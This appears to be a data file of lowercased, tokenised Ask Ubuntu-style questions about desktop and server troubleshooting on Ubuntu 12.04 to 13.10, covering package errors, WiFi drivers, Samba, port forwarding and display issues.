427352	how can i change the size of the mozilla firefox screen ?	i accidentally made firefox take up the whole screen but it is not in full screen mode . how do i shrink it back down so i can see other open windows ?
427356	how to allow port 80 reachable by externet network ?	i had installed a crm in my lan server , i can access to the server within lan without any issue . now i wish to open it to able access through outside of the network . so how i do my configurations is registered an account for dyndns to get my ip update by my router automatically . port forward all traffic port 80 tcp to my internal server . but i still couldnt access to my crm through external network . this is my domain gms-vtiger.dyndns.org/crm3 any idea what should i do ? please advice .
427357	autodesk maya 2014 on ubuntu 12.04	i had maya 2014 installed on my ubuntu machine and this runs like a charm . as of 10th february the service pack 4 is available i decided to update maya to the latest recent version ext sp4 . maya crashes now on opening with a segmentation fault . /usr/autodesk/maya2014-x64/bin/maya2014 qt : session management error : none of the authentication protocols specified are supported maya encountered a fatal error signal : 11 ( unknown signal ) stack trace : /lib/x86_64-linux-gnu/libc.so.6 ( +0x364a0 ) [ 0x7fe5fcb2c4a0 ] jpeg_createdecompress /usr/autodesk/maya2014-x64/qt-plugins/imageformats/libqjpeg.so ( +0x39d7 ) [ 0x7fe5e3f589d7 ] /usr/autodesk/maya2014-x64/qt-plugins/imageformats/libqjpeg.so ( +0x56e7 ) [ 0x7fe5e3f5a6e7 ] /usr/autodesk/maya2014-x64/qt-plugins/imageformats/libqjpeg.so ( +0x576c ) [ 0x7fe5e3f5a76c ] qimagereader : :read ( qimage* ) qimagereader : :read ( ) qpixmapdata : :fromfile ( qstring const & , char const* , qflags < qt : :imageconversionflag > ) qpixmap : :load ( qstring const & , char const* , qflags < qt : :imageconversionflag > ) qpixmap : :qpixmap ( qstring const & , char const* , qflags < qt : :imageconversionflag > ) qmayaqthelper : :createpixmapfrompath ( tstring & ) qmayaqthelper : :createpixmap ( tstring & ) qmayaicontextcontrol : :createiconpixmap ( qstring const & ) qmayaicontextcontrol : :seticon ( qstring const & , int , bool , bool ) telficontextbasecmd : :doeditflags ( ) telficontextbuttoncmd : :doeditflags ( ) tshelfbuttoncmd : :doeditflags ( ) ticebasecmd : :docreate ( ) ticebasecmd : :docommand ( targlist & ) mel_command_dispatch ( sphnode* ) node_exec fc_if node_exec f_function_entry_node node_exec sophia_call_executable sophiaexecutable : :evaluate ( void* ) tcommandengine : :sourcefile ( tstring const & ) tmayamodulesupport : :loadmodulescripts ( tstring const & ) loadmodulescriptsatmayainit /usr/autodesk/maya2014-x64/bin/maya.bin ( ) [ 0x40dd48 ] /usr/autodesk/maya2014-x64/bin/maya.bin ( ) [ 0x4153fa ] tapplication : :start ( ) /usr/autodesk/maya2014-x64/bin/maya.bin ( ) [ 0x40f936 ] main __libc_start_main /usr/autodesk/maya2014-x64/bin/maya.bin ( ) [ 0x40c1f9 ] for me it seems libc related but im not sure . maybe someone could help here a little step of course i exported my nvidia path to make sure maya can see my nvidia libs . this is how start it : env home=/home/user/maya env ld_library_path=/usr/lib/nvidia-331 env lc_numeric= '' c '' /usr/autodesk/maya2014-x64/bin/maya2014 any kind of help would be very usefull as it worked before i updated to sp4 . well i have to say that i not converted the .rpm based packages to .deb . i extracted the content of the sp4 maya*.rpm and copied it over my installation path .
427358	install pillow for python 3	what 's the best way to install pillow for python 3 ?
427362	reinstall virtualbox on kubuntu 13.10	i 've been running virtual box 4.3.6 with the latest guest addition perfectly but an upgrade appeared and i tried to upgrade to 4.3.8 and then a message of broken virtual box appeared . i tried many forums for help but in the end a message appears : '' the package virtualbox-4.3 needs to be reinstalled , but i ca n't find an archive for it . '' also my ubuntu software center and synaptic package manager are not working . i can not uninstall either . i got this notifications '' an internal system error has occured e : the package virtualbox-4.3 needs to be reinstalled , but i ca n't find an archive for it . e : unable to apply corrections for half-installed packages ''
427363	setting up ubuntu server with firewall - do i need 2 nics ?	assume a lan where 4 port adsl router , server and pcs all connect to a network switch . apart from working with the server , the workstations must have restricted access on what sites they can use . for example , i do n't want the pc users to go on youtube or facebook . if i 'm to setup a server for my lan , do i need to have 2 nics on the server ? btw , i 'm thinking of using ubuntu desktop 12.04 for the server so that the desktop can also be used by another user . so is the above setting possible or will it be necessary to use 2 nics and physically connect only the server to the router ? thanks for your inputs !
427370	duplicate alias addresses in the network ?	currently i use alias ip address to make sure the client talks to the active database . basically the alias ip always is on always on the active database , during the failover , the script will reassign that ip to the new active database . here is the scenario , the alias ip is on the active node , but it disconnected from the network , the failover script will promote the standby database to become the active one and assign that alias ip address to it . then the previous one is reconnected to the network , at that time the alias address exists on two server , which one wins ? cheers bing
427375	how to download wine and install to many computers	i 'm an ict tutor at a school and we have moved from windows to ubuntu . i need to download wine and install ms office for the students for their office work - we can not use open office for their practicals for now . we have a limitation in terms of bandwidth , so our machines are restricted in terms of downloads . how can i download a single package of wine and then install it to several computers seeing we have slow and limited internet . i 'm fairly new to ubuntu so step by step instructions would be nice .
427377	just received an error message in terminal	my mouse has just stopped working - left click , right click , scroll - on the ubuntu desktop . i clicked inside ccsm and the code below popped up in my terminal : /usr/lib/python2.7/dist-packages/ccm/settings.py:1356 : gtkwarning : ia__gdk_window_get_events : assertion 'gdk_is_window ( window ) ' failed ret = dlg.run ( ) /usr/lib/python2.7/dist-packages/ccm/settings.py:1356 : warning : g_object_ref : assertion 'g_is_object ( object ) ' failed ret = dlg.run ( ) /usr/lib/python2.7/dist-packages/ccm/settings.py:1356 : warning : g_object_unref : assertion 'g_is_object ( object ) ' failed ret = dlg.run ( )
427378	booting ubuntu 13.10 on toshiba a6 amd 64-bit , legacy mode , no display	everyone , i have a toshiba a6 with an amd 64-bit processor , with windows 8 pre-installed , unfortunately . i am trying to boot ubuntu 13.10 64-bit , from a usb stick in legacy mode . it seems to boot pretty well , but then it fails to load the gui , loads a command-line instead . doing `` gnome-session '' yields a `` can not open display '' error . doing a `` startx '' also does not solve the problem . one more thing , from the grub screen , choose `` check disk for defects '' yields an `` error with 2 files ! '' message for some reason . i tried erasing the usb installation and creating again many times , to no avail . what else can i do to solve this problem ? thank you ! : )
427379	where can i find the directory structure and important files paths explained ?	server only therefore console only . i assume it must be somewhere in /usr/share/doc/ ? http : //www.pathname.com/fhs/ ( filesystem hierarchy standard )
427381	ubuntu 13.10 on asus h81m-e motherboard	i 'm building an ubuntu desktop on an asus h81m-e motherboard . i have installed ubuntu 13.10 64bit as the base but it ca n't see the network card . according to the asus website , i have a realtek速 8111g , 1 x gigabit lan controller and the 3.11 kernel is meant to support it . i googled and installed the asus r8168 kernel module but still no network adapter . how can i access my network card ?
427383	realtek rtl8188ee slow download rate	this may be a duplicate , but i have been pulling my hair out . i just bought a new toshiba l75d-a7283 , and i really hate windows 8.1 , so i decided to put ubuntu 12.04 lts on it . besides a couple of uefi and graphics issues ( which i have resolved ) , everything works pretty well . however , for some odd reason my wireless connection has about 50 % -75 % less download speed than windows ( ranges a lot and can be extremely slow even with a 75mbps service ) . the upload speed is the same as on windows however . the lan port works as well . i have re-installed ubuntu about 6-7 times already , trying everything i can find to get this working . i have tried compiling the latest drivers , using ndiswrapper , ignoring ipv6 , etc . i do n't know what else to do , and i was hoping someone here could direct me . let me know what information you need and i will provide it via edits . reply to maris ' comments : i am currently on verzion fios with a wireless modem . i measured speed between windows and ubuntu on the same machine . my desktop and other laptop ( windows 7 ) get about 65mbps download via wireless , which is the same as this machine on windows 8.1 . the upload is the same across all computers and operating systems . in ubuntu the machine in question gets 80mbps via hardwired connection - the same as windows . so it is only wireless download speed on ubuntu . my network is not slower in general , just the toshiba with ubuntu 12.04 . thanks much in advance
427390	ubuntu touch and mt66592 phones	i have read that ubuntu touch will run on smartphones of meizu and bq . this phones work with mt6592 processor . because i want to buy in the near future a new phone and this should be with a 6592 cpu . i ask for info if ubuntu touch work on other phones with the same cpu . the phone should have mhl , nfc and otg support and must have 2 gb ram and 32 gb rom .
427397	what text editor will not overload my xubuntu 13.10 ?	i do n't do a lot of it , but i need to edit some html files and need a text editor to do it . i liked the looks of kate but someone in the forum said kate would be a big download for me because i 'm xubuntu . and since i 've converted an old dell with only a 40 gb hd , and i do n't really need a feature-laden text editor , i 'm not eager to overload it . just a text editor that plays nice with xubuntu 13.10 will do . i 've heard good things about bluefish . will that not overload my xubuntu 13.10 ?
427401	ubuntu 12.04.4 64 bit does not install	i have a acer travelmate p-643m with an i3 2370m . now technically i should be successful in installing a 64 bit operating system on this machine but for some reason that does not happen . till two days back i had been using 12.04.4 , the 32 bit version and it had it no issues . the system ran smoothly for over a year . however due to a project i had to change my system from 32 to 64 . earlier the error i got was the normal.mod not found error . i have checked the solution provided on this site for that question , but post entering those commands now my laptop boots to a grub page , which has the grub command line . i tried setting boot and prefix according to an answer but to no avail . also why did the normal.mod error say : error : file '/grub/i386-pc/normal.mod ' not found ? should n't it be i386 ? where am i going wrong ? any ideas ? i 've included the screenshot of fdisk -l .
427403	ubuntu 13.10 - how can i install package ?	how to fix this problem ? everytime i am trying to install/update packages it fails root @ nson : ~ # sudo apt-get install dconf-editor reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : dconf-editor 0 upgraded , 1 newly installed , 0 to remove and 230 not upgraded . need to get 99,4 kb of archives . after this operation , 492 kb of additional disk space will be used . err http : //be.archive.ubuntu.com/ubuntu/ saucy/universe dconf-editor amd64 0.16.1-1 could not resolve 'be.archive.ubuntu.com' failed to fetch http : //be.archive.ubuntu.com/ubuntu/pool/universe/d/d-conf/dconf-editor_0.16.1-1_amd64.deb could not resolve 'be.archive.ubuntu.com' e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? root @ nson : ~ # root @ nson : ~ # sudo apt-get update 0 % [ connecting to be.archive.ubuntu.com ] [ connecting to security.ubuntu.com ] [ connecting to extras.ubuntu.com ]
427404	how to resolve wifi disconnects and ca n't reconnect until disable and re-enable networking ?	i do n't know if this is something that already has a solution or not . i am running ubuntu 12.04 lts and wireless driver rtl8187 . my wireless connection drops after a while ( like an hour or so ) and seems to occur after some period of inactivity from the mouse/keyboard . i have tried disabling the automatic screen shutdown and by association the suspend and this has not resolved the issue . in addition to the wireless connection dropping , it will not reconnect unless i disable and re-enable networking . i do this from the gui as i tend to have issues running network control commands via the command line if i run the network manager ( which i like to use to monitor the network status via the tray icon when using the computer ) . if there is any way to maintain the network connectivity i would be much obliged . thanks in advance , -jared
427409	how do i get rid of psychedlic-like red and green shading on all video playback ?	bright green and red shadowy images are on all my videos , youtube , tutorials , everything . the audio is fine . how can i straighten out the video ? first of all , i did this ( see screenshot of terminal ) and it did n't work . do i need to un-do this ? ( and if so , how ? ) and here 's a screenshot of the video :
427411	network bridge has no internet access	i have a machine with two network adapters and i want to use it to share its internet connection to an ip phone ( because there 's only one cat5 cable available and while the phone has built-in switch functionality , it does n't support gigabit speeds ) . i would much prefer if the two were on the same network , so i do n't want a nat gateway , but a bridge . i installed bridge-utils and followed the steps described in this guide . after starting dhclient , the bridge interface gets an ip address from the router ( and is accessible by ssh from lan ) , but the machine has now no internet access . when i was doing this through the interfaces file , adding a gateway line enabled me to ping ips outside of lan , but i could not get dns to work . appending nameservers to the interfaces file did not help . what should i do to enable internet access ? i understand that i probably need to add the nameservers into a configuration file somewhere . but where ? interfaces does n't work , resolvconf.d is an unholy mess ( i do n't know what to do with that ) , and i do n't want to use dhclient config because ideally the machine should have a static ip . thank you for your time and your insights into this .
427413	dpkg : error processing ( -- unpack ) ( raspberrypi compiler - ubuntu )	ubuntu @ ubuntu : ~/raspberrypi/devel $ sb2 -er apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : alsa-base gnome-themes-standard lxde lxsession openssh-client openssh-server scratch wpasupplicant the following packages will be upgraded : alsa-utils apt apt-utils aptitude aptitude-common base-files bash binutils bsdutils bzip2 ca-certificates console-setup console-setup-linux consolekit coreutils cpio cpp cpp-4.6 cryptsetup-bin curl dbus dbus-x11 dconf-gsettings-backend dconf-service debconf debconf-i18n debconf-utils debian-reference-common debian-reference-en desktop-base dictionaries-common dmsetup dpkg dpkg-dev e2fslibs e2fsprogs eject file firmware-atheros firmware-brcm80211 firmware-libertas firmware-ralink firmware-realtek fontconfig fontconfig-config fuse g++ g++-4.6 gcc gcc-4.4-base gcc-4.6 gcc-4.6-base gcc-4.7-base gconf-service gconf2 gconf2-common gdb gdbserver gir1.2-gst-plugins-base-0.10 gir1.2-gstreamer-0.10 gnupg gpgv gsettings-desktop-schemas idle idle-python2.7 idle-python3.2 idle3 ifupdown initscripts insserv iptables isc-dhcp-client isc-dhcp-common iso-codes keyboard-configuration kmod krb5-locales libapt-inst1.5 libapt-pkg-dev libapt-pkg4.12 libasound2 libavahi-client3 libavahi-common-data libavahi-common3 libblkid1 libboost-iostreams1.49.0 libbsd0 libbz2-1.0 libc-bin libc-dev-bin libc6 libc6-dev libcairo-gobject2 libcairo2 libcap2 libck-connector0 libcomerr2 libcroco3 libcryptsetup4 libcups2 libcurl3 libdbus-1-3 libdbus-1-dev libdbus-glib-1-2 libdconf0 libdevmapper-event1.02.1 libdevmapper1.02.1 libdpkg-perl libdrm2 libelf1 libexpat1 libexpat1-dev libfm-data libfm-gtk-bin libfm-gtk1 libfm1 libfontconfig1 libfontconfig1-dev libfreetype6 libfreetype6-dev libfuse2 libgail-3-0 libgail18 libgcc1 libgconf-2-4 libgcrypt11 libgfortran3 libgif4 libgl1-mesa-glx libglapi-mesa libglib2.0-0 libglib2.0-bin libglib2.0-data libglib2.0-dev libgnutls26 libgomp1 libgpg-error0 libgssapi-krb5-2 libgstreamer-plugins-base0.10-0 libgstreamer-plugins-base0.10-dev libgstreamer0.10-0 libgstreamer0.10-dev libgtk-3-0 libgtk-3-bin libgtk-3-common libgtk2.0-0 libgtk2.0-common libgudev-1.0-0 libicu-dev libicu48 libjavascriptcoregtk-1.0-0 libjavascriptcoregtk-3.0-0 libjson0 libk5crypto3 libkmod2 libkrb5-3 libkrb5support0 liblapack3 liblapack3gf libldap-2.4-2 liblightdm-gobject-1-0 liblvm2app2.2 liblzma5 libmagic1 libmikmod2 libmount1 libnewt0.52 libnfnetlink0 libobrender27 libobt0 libopenjpeg2 libpam-ck-connector libparted0debian1 libpci3 libpcsclite1 libpixman-1-0 libpolkit-agent-1-0 libpolkit-backend-1-0 libpolkit-gobject-1-0 libportmidi0 libprocps0 libproxy0 libpulse0 libpython2.7 libraspberrypi-bin libraspberrypi-dev libraspberrypi-doc libraspberrypi0 libreadline6 librsvg2-2 librsvg2-common libsasl2-2 libsasl2-modules libsdl-mixer1.2 libsmpeg0 libsqlite3-0 libsqlite3-dev libss2 libssh2-1 libssl-dev libssl1.0.0 libstdc++6 libstdc++6-4.6-dev libsysfs2 libsystemd-login0 libthai-data libthai0 libtiff4 libudev-dev libudev0 libusb-0.1-4 libuuid1 libwbclient0 libwebkitgtk-1.0-0 libwebkitgtk-1.0-common libwebkitgtk-3.0-0 libwebkitgtk-3.0-common libwebp2 libwrap0 libx11-6 libx11-data libx11-xcb1 libxapian-dev libxapian22 libxcb-glx0 libxcb-render0 libxcb-shm0 libxcb1 libxcursor1 libxext6 libxfixes3 libxfont1 libxi6 libxinerama1 libxml2 libxml2-dev libxrandr2 libxrender1 libxres1 libxslt1-dev libxslt1.1 libxt6 libxtst6 libxxf86vm1 lightdm linux-libc-dev locales lsb-base lua5.1 lxde-core lxtask manpages midori module-init-tools mount multiarch-support net-tools nfs-common ntfs-3g omxplayer openbox openssh-blacklist openssh-blacklist-extra openssl parted pciutils perl perl-base perl-modules policykit-1 procps psmisc python python-minimal python-numpy python-pygame python2.7 python2.7-minimal python3 python3-minimal python3-numpy python3.2 python3.2-minimal raspberrypi-bootloader raspi-copies-and-fills readline-common rsyslog samba-common sgml-base squeak-vm ssh sudo sysv-rc sysvinit sysvinit-utils tar tasksel tasksel-data tcpd ttf-dejavu-core tzdata udev udisks unzip util-linux vim-common vim-tiny wget whiptail x11-common xarchiver xkb-data xml-core xserver-common xserver-xorg xserver-xorg-core xserver-xorg-input-all xserver-xorg-input-synaptics xz-utils 319 upgraded , 0 newly installed , 0 to remove and 8 not upgraded . need to get 269 mb of archives . after this operation , 23.2 mb disk space will be freed . do you want to continue [ y/n ] ? y fetched 269 mb in 2min 11s ( 2,043 kb/s ) extracting templates from packages : 100 % preconfiguring packages ... ( reading database ... 54465 files and directories currently installed . ) preparing to replace base-files 6.9 ( using ... /base-files_7.1wheezy2+rpi1_armhf.deb ) ... unpacking replacement base-files ... dpkg : error processing /var/cache/apt/archives/base-files_7.1wheezy2+rpi1_armhf.deb ( -- unpack ) : trying to overwrite '/var/run ' , which is also in package isc-dhcp-client 4.2.2.dfsg.1-5 errors were encountered while processing : /var/cache/apt/archives/base-files_7.1wheezy2+rpi1_armhf.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ubuntu @ ubuntu : ~/raspberrypi/devel $ im was using this `` how to ... '' faq http : //www.pieczewski.de/programming/raspberrypi_crosscompile hope you can help me .
427414	make ctrl+t open a new ( chrome ) tab when outside of chrome	on chrome os it is always possible to open a new tab ( or actually browser window ) with the ctrl + t keyboard shortcut . is it possible to do this in ubuntu ? simply setting a keyboard shortcut wo n't work , because this will change the behavior when inside chrome ( e.g . it will always open a new window in stead of a new tab ) .
427420	how do i open an ebook from a urllink.acsm in xubuntu 13.10	i got an ebook for free on my windows computer and the book had drm so i had to sign up with adobe for a password and then i opened the book on adobe digital editions 2.0 . i have the link and the drm authorization says it 's good to be read on two more computers , but how do i get it to work on my xubuntu ?
427421	wireless hardware switch disabled in a compaq presario cq57-339wm notebook pc	i have downloaded and installed the realtek driver for linux based on what the manufacturer says and what the lspci cmd shows as given below 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) this is what it says when i use rfkill list all cmd in terminal to see what is blocked ; check the status results : 0 : hp-wifi : wireless lan soft blocked : no hard blocked : yes 1 : phy0 : wireless lan soft blocked : no hard blocked : yes and even earlier today to see if a usb wifi adapter would work , i borrowed one and installed the drivers for it and my tab that list connections listed both as disable by hardware switch and the usb wifi adapter has no switch , so i came to believe my hardware switch on my laptop is blocking any from of wifi . but enternet works just fine . this laptop used to be a windows 7 before i had to get a new hard drive and i installed unbuntu 12.04.lts i have never had any trouble with linux or ubuntu until i put it on my laptop
427426	ubuntu ltsp 5.5	right now i am trying to establish a xubuntu ltsp . there are some things that do not work and some things i do not understand . so i hope you can help me : ) . im using xubuntu 12.04 lts . my first setup was really basic . following the steps i made : installing ltsp-server dnsmasq set dnsmasq up as a dhcpproxy ltsp-build-client client works ltsp-server was delivered in version 5.3.7 . with config two my problems began : add repo ppa : ts.sch.gr install ltsp-server ltsp-client dnsmasq ltsp-config dnsmasq ltsp-update-image -- cleanup / ltsp-server in version 5.5 . short form the help page . so config two only worked when i did a ltsp-update-image -- cleanup / . if i just do a ltsp-build-client like in config one it does not work and ends up in a busy box . i ca n't understand this . what is the difference in version 5.3.7 and 5.5 . the ltsp-build-client only worked in the old one and the latest one does not work with this any more .
427427	want to display matlab figures in current workspace alone , ubuntu 12.04	i use multiple workspaces of ubuntu 12.04 for my work . for instance , i run matlab in one workspace and edit my documents in another . when i run my matlab code , it generates multiple figures . however , somehow they show up in visible workspace . so , if i run matlab , and am trying to edit a document in another workspace simultaneously , it gets interrupted due to constantly popping up figures . i want to do a setting such that the figures , will appear only the workspace in which matlab command window/editor are present . can anyone help me out in this regard ? i used compiz following the instructions in another thread , but could not succeed . the thread is : how can i prevent programs from switching workspaces ? thanks .
427428	errors when trying to install samba and share files	i installed ubuntu 13.10 64bit , and want to share some folders via network . sharing via nautilus fails with : can not install 'samba ' ( e : unable to correct problems , you have held broken packages . ) can not install 'libpam-smbpass ' ( e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . ) installing samba via terminal fails with samba-common is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libpam-smbpass : depends : samba-common ( = 2:3.6.18-1ubuntu3 ) but 2:3.6.18-1ubuntu3.1 is to be installed samba : depends : samba-common ( = 2:3.6.18-1ubuntu3 ) but 2:3.6.18-1ubuntu3.1 is to be installed depends : libwbclient0 ( = 2:3.6.18-1ubuntu3 ) but 2:3.6.18-1ubuntu3.1 is to be installed recommends : tdb-tools but it is not going to be installed e : unable to correct problems , you have held broken packages . sudo apt-get update http : //pastebin.com/psprnx6p sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded .
427429	ubuntu 13.10 - not prompted for login at start up	mostly - oddly not every time - when i reboot , or start up my laptop , i am not prompted for a password ; it goes straight into my desktop . i do n't like this one bit . there are other users on my laptop , i 'd rather get a greeter that allowed the booting to select their user . i am the only admin user . sometimes , when i do get a greeter ( for just my user ) , after i login , i get kicked out and have to login again . again , this is not consistent behaviour . i ca n't be certain , but this may have began shortly after i bought an external monitor . certainly the double login stuff started at that time . it happens now , on occasion , whne i am not plugged into the external monitor .
427430	list of past commands used in the shell	how can i easily see a list of commands i recently entered in the shell ? instead of going up
427432	how can i hide encrypted volumes from unity users ?	basically i want to make sure that users can not mount or attempt to decrypt and mount local volumes . i figured for unencrypted volumes it is sufficient to create a noauto fstab entry that points to a path that can not be accessed by any user for the volumes not to show in the file explorer anymore . however , for ( luks ) encrypted volumes it seems to be a different story . creating crypttab entries does n't make a difference it seems . only opened crypt volumes wo n't show up in the file explorer anymore . how can i disable that encrypted volumes are shown to the users ? preferably not by configuring any per-user settings but globally .
427438	remote desktop client for windows with sound support	please advice windows client to connect to ubuntu remotely . i need to have audio support also . i used x2go but there were problems with audio . is there anything else to try ? thanks , alexey
427442	how to read audio comments of a pdf fie created in an ipad	i have to listen to comments recorded in a pdf file by my supervisor ; she used an ipad . on the pdf-file i can see a little symbol with a `` speaker '' but when i click there nothing happens . i can see the written comments . i have read and tried to install the software they refer here : play audio that are embedded in pdf file but nothing changes . could not install adobe reader , but could install so many other types of sw such as totem , mplayer , and nothing happens . i really need this working ! is anyone there that can help me ? i have the last version of ubuntu 64 bits ( 13.10 )
427447	is is possible to swap the ctrl and super keys in ubuntu 13.10 ?	first of all , this is not the same as swapping control and windows ( super ) keys not working in unity since alt/win are apparently the same key in my keyboard . so i have ctrl , super , alt/win as recognized by gnome-tweak-tool and i would like to swap ctrl and super . this is not a mac , but a regular pc so the bug they reference there does n't quite help me . if i use the method described in how do i remap certain keys ? with xmodmap nothing happens . further , the options in gnome-tweak-tool include a single option for moving the super key and it moves it to the menu key . that does work but it does n't help me since i 'd like to have super be ctrl and ctrl be super . is that possible ? edit by the way , xmodmap does not work for me , as i mentioned . so perhaps this is more an issue of `` can you help me figure out why xmodmap is not working ? '' if i do this via xmodmap and then print out xmodmap -pke then it says that keycode 37 ( which was control_l ) is super_l ( which was 133 ) and 133 is control_l , but in effect the key swap has not occurred ( i.e . the keys still behave as before ) .
427449	how do i share a file with other users ?	i am using ubuntu 12.04 lts and i shared a file call set . when i open the gui , and click on browse network and press harshita-hp-prob it takes me to then i press set and it asks for a password which i do not remember : ( how do i change the password i have root and admin privileges
427452	unable to boot into windows after installing ubuntu alongside	i have just installed ubuntu 12.04 alongside my existing windows 7 . but i do not get any option to boot into windows 7 . i have tried to install a grub such that i now have a boot menu in which i should be able to choose windows 7 ( only ubuntu options appears ) . ( i have found no help in similar questions )
427454	ubuntu server http redirect to other server ?	ok , so i have two servers on my local network . one of them serves cctv over the internet ( for remote viewing ) and the other serves wordpress sites . the cctv server is in my router 's dmz , but since i can only assign one machine to the dmz , i am wondering if there 's a way i can keep the existing cctv stream but also redirect to the other server , perhaps using some kind of port forwarding . alas , i do n't yet have a good enough understanding of terminal commands to accomplish this . both machines run ubuntu server 12.04 lts and have static ip addresses on the lan .
427458	how to bring out the tray at the bottom in ubuntu gnome 13.10	i 'm using ubuntu gnome 13.10 . i accidentally moved the cursor somewhere near the right-bottom part of the screen and it brought out this pane - i want to know how do you get to that pane . are there any keyboard shortcuts for this ?
427460	13.10 installing issues/ metalink	i tried to install 13.10 ( 32-bit ) through wubi.exe and got an error message can not download the meta link and iso then the installation process stopped . i would like to know the reason for this .
427469	kubuntu 12.04 login screen	is it possible to have a login screen for kubuntu 12.04 where i can click a user 's name instead of typing it in ?
427474	ubuntu desktop 12.04 desktop environment customization	i am a new linux user , i want to accomplish the following settings of the followings no dash icon no trash icon no workspace switcher icon in global menu bar , only show the current time , but ca n't modify in global menu bar , the gear icon only show the shutdown option by user disable short cut key is it possible to do these on ubuntu desktop 12.04 lts ?
427478	having computer switch to guest account after a certain amount of time	instead of having the screensaver lock my computer is it possible to have it switch to the guest account instead . i 'm using ubuntu 13.10 64bit thanks
427479	unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ?	i get this error in lubuntu 12.04 when i try to update in terminal : $ apt-get update e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ?
427482	errors with apt-get update command	when i run a sudo apt-get update command i get these errors at last row : reading package lists ... error ! e : problem syncing the file - sync ( 5 : input/output error ) e : the package lists or status file could not be parsed or opened . i have no idea about this , trying browser into google and found an ways to fix it sudo rm /var/lib/apt/lists/* -vf sudo apt-get clean sudo apt-get update but no result after run those commands , even i get more worse . is there way to fix it 's or i must install new ubuntu os ?
427483	how install mysql 5.6 and mysql workbench 6.0.9 on ubuntu 13.10	i am using ubuntu 13.10 saucy salamander ( 64 bit system ) . i want to install mysql 5.6 and workbench 6.0.9 on it . how i do it please describe step by step ?
427485	rubymine creating shortcut in desktop error	i 've installed rubymine , but it is in a different drive . when i tried to create a desktop icon for rubymine it showed the following error : unable to locate suitable startup script in /meadia/data/installedfolder/rubymine/bin is it an issue with installation ? what is the suggested folder to install the software ? [ extracting and running scripts ] if it is installed in another drive i need to mount it before running the application . so how to manage that ?
427486	not possible to connect to a specific wifi : how to get more information about the reason	i am trying to connect to a wifi-network of which i know the ssid , password and type of encryption . i can connect to it with my desktop . if i try to connect to it with my laptop , the connection is building up ( `` loading circle '' ) but after a while the loading stops and there is no notification that something is wrong . in both cases i use nm-applet . i am on a xubuntu 12.04 machine . i can connect to different networks without problems . how can i find out why the connection got rejected ? i have no access on the router . more information here : lspci 02:00.0 network controller : broadcom corporation bcm43227 802.11b/g/n ... 01:00.0 ethernet controller : broadcom corporation netlink bcm57780 gigabit ethernet pcie ( rev 01 ) sudo lshw -c network *-network description : ethernet interface product : netlink bcm57780 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 01 serial : dc:0e : a1:2f:03:9d size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.121 duplex=full firmware=sb ip=141.3.25.232 latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:42 memory : b3400000-b340ffff *-network description : wireless interface product : bcm43227 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth2 version : 00 serial : 94:39 : e5:45:7f : ab width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : b2400000-b2403fff edit : output in syslog during connection process
427490	it 's not possible to install ubuntu on acer v5-122p computer	hi everyone from ubuntu ! i come here with tremendous disappointment to inform that it 's not possible to install ubuntu on the hardware from acer v5-122p . however , even more serious is that a bunch of other hardwares , specially those with this new secure boot and with wind8 pre-installed , does not support ubuntu installation . indeed just few hardwares presently available are capable to support ubuntu for installation . and it 's been a nightmare , since scientifical computation field is linux based ! ! i 'm really desperate ! ! ! what we , thousands and thousands of people , could do now ? ? ? do you think that this problem will be one day overcomed ? ? ? thank you very much in advance , cristiano amaral .
427492	errors were encountered while prosecessing:	ubuntu @ ubuntu : ~/raspberrypi/devel $ sb2 -er apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : alsa-base gnome-themes-standard lxde lxsession openssh-client openssh-server scratch wpasupplicant the following packages will be upgraded : raspi-copies-and-fills 1 upgraded , 0 newly installed , 0 to remove and 8 not upgraded . 10 not fully installed or removed . need to get 0 b/4,926 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 54352 files and directories currently installed . ) preparing to replace raspi-copies-and-fills 0.1 ( using ... /raspi-copies-and-fills_0.4-1_armhf.deb ) ... unpacking replacement raspi-copies-and-fills ... qemu : uncaught target signal 4 ( illegal instruction ) - core dumped dpkg : warning : subprocess old post-removal script was killed by signal ( illegal instruction ) , core dumped dpkg : trying script from the new package instead ... qemu : uncaught target signal 4 ( illegal instruction ) - core dumped dpkg : error processing /var/cache/apt/archives/raspi-copies-and-fills_0.4-1_armhf.deb ( -- unpack ) : subprocess new post-removal script was killed by signal ( illegal instruction ) , core dumped errors were encountered while processing : /var/cache/apt/archives/raspi-copies-and-fills_0.4-1_armhf.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ubuntu @ ubuntu : ~/raspberrypi/devel $
427495	how can i change `` show desktop '' icon following icons theme ?	i 've installed numix-circle icons themes and inside there is a `` show-desktop.svg '' icon , but the icon loaded remains `` user-desktop.svg '' from the numix theme . where the show desktop icons is located ? how can i change it ? thanks
